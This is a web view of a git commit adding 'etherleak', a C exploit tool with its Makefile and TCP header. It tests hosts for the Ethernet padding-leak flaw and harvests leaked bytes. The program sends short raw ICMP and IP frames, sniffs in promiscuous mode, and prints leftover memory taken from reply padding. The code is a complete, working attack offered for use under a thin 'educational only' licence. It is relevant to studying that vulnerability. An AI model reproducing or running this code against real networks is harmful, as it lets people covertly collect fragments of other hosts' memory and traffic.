summaryrefslogtreecommitdiff
path: root/other/etherleak
diff options
context:
space:
mode:
authorRoot THC2026-02-24 12:42:47 +0000
committerRoot THC2026-02-24 12:42:47 +0000
commitc9cbeced5b3f2bdd7407e29c0811e65954132540 (patch)
treeaefc355416b561111819de159ccbd86c3004cf88 /other/etherleak
parent073fe4bf9fca6bf40cef2886d75df832ef4b6fca (diff)
initial
Diffstat (limited to 'other/etherleak')
-rw-r--r--other/etherleak/Makefile11
-rw-r--r--other/etherleak/etherleak.c360
-rw-r--r--other/etherleak/tcp.h31
3 files changed, 402 insertions, 0 deletions
diff --git a/other/etherleak/Makefile b/other/etherleak/Makefile
new file mode 100644
index 0000000..a62d159
--- /dev/null
+++ b/other/etherleak/Makefile
@@ -0,0 +1,11 @@
1CC=gcc
2CFLAGS=-g -Wall
3
4all:
5 $(CC) $(CFLAGS) `libnet-config --defines --cflags` $(CFLAGS) etherleak.c -o s\
6 -lpcap -lnet -lpthread
7
8
9
10
11
diff --git a/other/etherleak/etherleak.c b/other/etherleak/etherleak.c
new file mode 100644
index 0000000..00f21d7
--- /dev/null
+++ b/other/etherleak/etherleak.c
@@ -0,0 +1,360 @@
1/*
2 * Copyright (C) 2001 Stealth.
3 * All rights reserved.
4 *
5 * THIS IS NOT OPEN SOURCE, SO READ ON.
6 *
7 * Redistribution in source and binary forms, with or without
8 * modification, are NOT permitted.
9 *
10 * Use of this software is permitted provided that the following conditions
11 * are met:
12 *
13 * 1. You may not use this software to cause damage or any other illegal
14 * activities. It is for educational purpose only. You may not use this
15 * software for commercial purposes.
16 * 2. You may change the sourcode to meet your needs. You are not allowed
17 * to change this copyright notice.
18 * 3. This is private sourcecode, you should have received this file only
19 * from the author itself.
20 * 4. The author may change the above copyright at any time. He may even publish
21 * this code without notify you first.
22 *
23 * THIS SOFTWARE IS PROVIDED BY THE AUTHOR ``AS IS'' AND ANY
24 * EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
25 * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
26 * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR BE LIABLE
27 * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
28 * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
29 * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
30 * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
31 * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
32 * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
33 * SUCH DAMAGE.
34 */
35#include <stdio.h>
36#include <sys/types.h>
37#include <libnet.h>
38#include <pthread.h>
39#include <pcap.h>
40#include "tcp.h"
41
42
43struct {
44 char *dev;
45 int promisc;
46 unsigned char my_mac[6], gw_mac[6];
47 char *my_ip;
48} options;
49
50/*
51 {"eth0", 0,
52 {0x00, 0x50, 0x22, 0x88, 0x29, 0x93},
53 {0x00, 0x40, 0x05, 0x6d, 0x1a, 0x90},
54 "192.0.0.1"
55};
56*/
57
58pcap_t *pcap_prepare(char *);
59void complain(const char *);
60
61
62int opt_fill_mac(const char *mac_format, unsigned char mac[6])
63{
64 int n;
65 unsigned short int t[6];
66
67 n = sscanf(mac_format, "%02hx:%02hx:%02hx:%02hx:%02hx:%02hx",
68 &t[0], &t[1], &t[2],
69 &t[3], &t[4], &t[5]);
70
71 mac[0] = (u_char)t[0];
72 mac[1] = (u_char)t[1];
73 mac[2] = (u_char)t[2];
74 mac[3] = (u_char)t[3];
75 mac[4] = (u_char)t[4];
76 mac[5] = (u_char)t[5];
77
78 return n == 6 ? 0 : -1;
79}
80
81
82/* Check wheter 'target' is vulnerable to
83 * ether-leakage
84 */
85void vulnerability_test(const char *target)
86{
87 pcap_t *pcap_handle;
88 char fstring[1024], send_pack[128],
89 *payload = "XXXXXXXXXXXXXXXXXX"; /* 18byte */
90 u_long src_l, dst_l;
91 struct hostent *he;
92 struct pcap_pkthdr phdr;
93 u_char *pkt;
94
95 int r, raw_fd = libnet_open_raw_sock(IPPROTO_ICMP);
96
97 snprintf(fstring, sizeof(fstring),"icmp and dst host %s and icmp[0]==0",
98 options.my_ip);
99
100 pcap_handle = pcap_prepare(fstring);
101
102 r = libnet_build_icmp_echo(8, 0, 0x7350, 1, payload, 18,
103 &send_pack[LIBNET_IP_H]);
104 if (r < 0)
105 complain("libnet_build_icmp_echo failed\n");
106
107 if ((he = gethostbyname(options.my_ip)) == NULL) {
108 herror("gethostbyname");
109 exit(7);
110 }
111 src_l = *(u_long*)he->h_addr;
112 if ((he = gethostbyname(target)) == NULL) {
113 herror("gethostbyname");
114 exit(7);
115 }
116 dst_l = *(u_long*)he->h_addr;
117
118 r = libnet_build_ip(0,
119 0, /* TOS */
120 0, /* ID */
121 0, /* frag */
122 64, /* TTL */
123 IPPROTO_ICMP,
124 src_l, dst_l,
125 &send_pack[LIBNET_IP_H],
126 LIBNET_ICMP_ECHO_H+18, send_pack);
127
128 if (r < 0)
129 complain("libnet_build_ip failed\n");
130
131 /* send normal packet, one that fits to 46 byte of payload */
132 libnet_do_checksum(send_pack, IPPROTO_ICMP,
133 LIBNET_ICMP_ECHO_H+18);
134
135 libnet_write_ip(raw_fd, send_pack, 46);
136
137 /* send shport packet (1 byte payload) */
138 send_pack[LIBNET_IP_H+LIBNET_ICMP_ECHO_H] = 'Y';
139 libnet_do_checksum(send_pack, IPPROTO_ICMP,
140 LIBNET_ICMP_ECHO_H+1);
141 libnet_write_ip(raw_fd, send_pack, 29);
142
143
144 for (r = 0; r != 2;)
145 if ((pkt = pcap_next(pcap_handle, &phdr)))
146 ++r;
147
148 libnet_close_raw_sock(raw_fd);
149
150 if (phdr.len != 60) {
151 printf("'%s' not vulnerable (!= 60 byte in reply)\n", target);
152 exit(0);
153 }
154
155 if (pkt[14+20+8+3] == 'X')
156 printf("'%s' vulnerable!\n", target);
157 else
158 printf("'%s' not vulnerable!\n", target);
159
160 printf("Got '");
161 write(1, &pkt[14+20+8], 18);
162 printf("'\n");
163
164 exit(0);
165}
166
167
168void usage()
169{
170 fprintf(stderr, "Usage: etherleak <-I my_IP> <-S my_MAC> <-T gw_MAC>\n"\
171 " [-D device] [-P promisc] [-V v]\n\n");
172 exit(1);
173}
174
175
176void die(const char *s)
177{
178 perror(s);
179 exit(errno);
180}
181
182
183void complain(const char *s)
184{
185 fprintf(stderr, "%s", s);
186 exit(2);
187}
188
189
190char last_seen[26];
191
192
193void process_packet(u_char *user, const struct pcap_pkthdr *pkthdr,
194 const u_char *pkt)
195{
196 struct e_tcphdr *tcph = (struct e_tcphdr*)(pkt+14+20);
197
198 if (memcmp(last_seen, pkt+14+20, 26) == 0)
199 return;
200 memcpy(last_seen, pkt+14+20, 26);
201 printf("%d->%d ", ntohs(tcph->th_sport), ntohs(tcph->th_dport));
202 write(1, pkt+14+20+20, 6);
203 printf("\n");
204}
205
206
207pcap_t *pcap_prepare(char *filter_string)
208{
209 char ebuf[PCAP_ERRBUF_SIZE];
210 pcap_t *handle = NULL;
211 u_int32_t localnet, netmask;
212 struct bpf_program filter;
213
214 handle = pcap_open_live(options.dev, 512, options.promisc, 100, ebuf);
215 if (!handle)
216 die(ebuf);
217
218 if (pcap_lookupnet(options.dev, &localnet, &netmask, ebuf) < 0)
219 die(ebuf);
220
221 if (pcap_compile(handle, &filter, filter_string, 1, netmask) < 0) {
222 fprintf(stderr, "Can't compile filter %s\n", filter_string);
223 exit(5);
224 }
225
226 if (pcap_setfilter(handle, &filter) < 0) {
227 fprintf(stderr, "Can't set filter.\n");
228 exit(6);
229 }
230 return handle;
231}
232
233
234
235void *capture_thread(void *vp)
236{
237 pcap_t *handle = NULL;
238 char fstring[1024];
239
240 snprintf(fstring, sizeof(fstring), "ether dst %x:%x:%x:%x:%x:%x",
241 options.my_mac[0], options.my_mac[1], options.my_mac[2],
242 options.my_mac[3], options.my_mac[4], options.my_mac[5]);
243
244 handle = pcap_prepare(fstring);
245 pcap_loop(handle, -1, process_packet, NULL);
246 return NULL;
247}
248
249
250void *send_thread(void *vp)
251{
252 struct hostent *src, *dst;
253 int r;
254 u_long src_l, dst_l;
255 char buf[100], ebuf[1024];
256 struct libnet_link_int *link;
257
258
259 if ((src = gethostbyname(options.my_ip)) == NULL) {
260 herror("gethostbyname");
261 exit(h_errno);
262 }
263 src_l = *(u_long*)src->h_addr;
264 if ((dst = gethostbyname(options.my_ip)) == NULL) {
265 herror("gethostbyname");
266 exit(h_errno);
267 }
268 dst_l = *(u_long*)dst->h_addr;
269
270 link = libnet_open_link_interface(options.dev, ebuf);
271
272 r = libnet_build_ip(0,
273 0, /* TOS */
274 0, /* ID */
275 0, /* frag */
276 64, /* TTL */
277 IPPROTO_IP,
278 src_l, dst_l,
279 NULL,
280 0, &buf[LIBNET_ETH_H]);
281 if (r < 0)
282 complain("libnet_build_ip failed\n");
283
284 r = libnet_build_ethernet(options.gw_mac, options.my_mac, ETHERTYPE_IP,
285 &buf[LIBNET_ETH_H], IP_H, buf);
286
287 if (r < 0)
288 complain("libnet_build_ethernet failed");
289
290 libnet_do_checksum(&buf[LIBNET_ETH_H], IPPROTO_IP, IP_H);
291
292 for (;;) {
293 libnet_write_link_layer(link, options.dev, buf,
294 IP_H+LIBNET_ETH_H);
295 usleep(2000);
296 }
297 libnet_close_link_interface(link);
298 return NULL;
299}
300
301
302int main(int argc, char **argv)
303{
304 pthread_t tid1, tid2;
305 void *r;
306 int c;
307 char *vuln_test = NULL;
308
309 memset(&options, 0, sizeof(options));
310 options.dev = strdup("eth0");
311 options.promisc = 1;
312
313 printf("Etherleak (C) 2001 by Stealth. >>> Confidential <<<\n\n");
314
315 while ((c = getopt(argc, argv, "S:T:I:D:P:V:")) != -1) {
316 switch (c) {
317 case 'I':
318 options.my_ip = strdup(optarg);
319 break;
320 case 'S':
321 if (opt_fill_mac(optarg, options.my_mac) < 0)
322 complain("Can't parse src MAC\n");
323 break;
324 case 'T':
325 if (opt_fill_mac(optarg, options.gw_mac) < 0)
326 complain("Can't parse dst MAC\n");
327 break;
328 case 'D':
329 free(options.dev);
330 options.dev = strdup(optarg);
331 break;
332 case 'P':
333 options.promisc = atoi(optarg);
334 break;
335 case 'V':
336 vuln_test = strdup(optarg);
337 break;
338 default:
339 usage();
340 }
341 }
342
343 if (!options.my_mac || !options.gw_mac || !options.my_ip)
344 usage();
345
346 setbuffer(stdout, NULL, 0);
347
348 if (vuln_test)
349 vulnerability_test(vuln_test); /* never returns */
350
351
352 pthread_create(&tid1, NULL, send_thread, NULL);
353 pthread_create(&tid2, NULL, capture_thread, NULL);
354
355 pthread_join(tid1, &r);
356 pthread_join(tid2, &r);
357
358 return 0;
359}
360
diff --git a/other/etherleak/tcp.h b/other/etherleak/tcp.h
new file mode 100644
index 0000000..1be4e4f
--- /dev/null
+++ b/other/etherleak/tcp.h
@@ -0,0 +1,31 @@
1#ifndef __ETHERLEAK_TCP_H__
2#define __ETHERLEAK_TCP_H__
3
4struct e_tcphdr
5 {
6 u_int16_t th_sport; /* source port */
7 u_int16_t th_dport; /* destination port */
8 tcp_seq th_seq; /* sequence number */
9 tcp_seq th_ack; /* acknowledgement number */
10# if __BYTE_ORDER == __LITTLE_ENDIAN
11 u_int8_t th_x2:4; /* (unused) */
12 u_int8_t th_off:4; /* data offset */
13# endif
14# if __BYTE_ORDER == __BIG_ENDIAN
15 u_int8_t th_off:4; /* data offset */
16 u_int8_t th_x2:4; /* (unused) */
17# endif
18 u_int8_t th_flags;
19# define TH_FIN 0x01
20# define TH_SYN 0x02
21# define TH_RST 0x04
22# define TH_PUSH 0x08
23# define TH_ACK 0x10
24# define TH_URG 0x20
25 u_int16_t th_win; /* window */
26 u_int16_t th_sum; /* checksum */
27 u_int16_t th_urp; /* urgent pointer */
28};
29
30#endif /* __ETHERLEAK_TCP_H__ */
31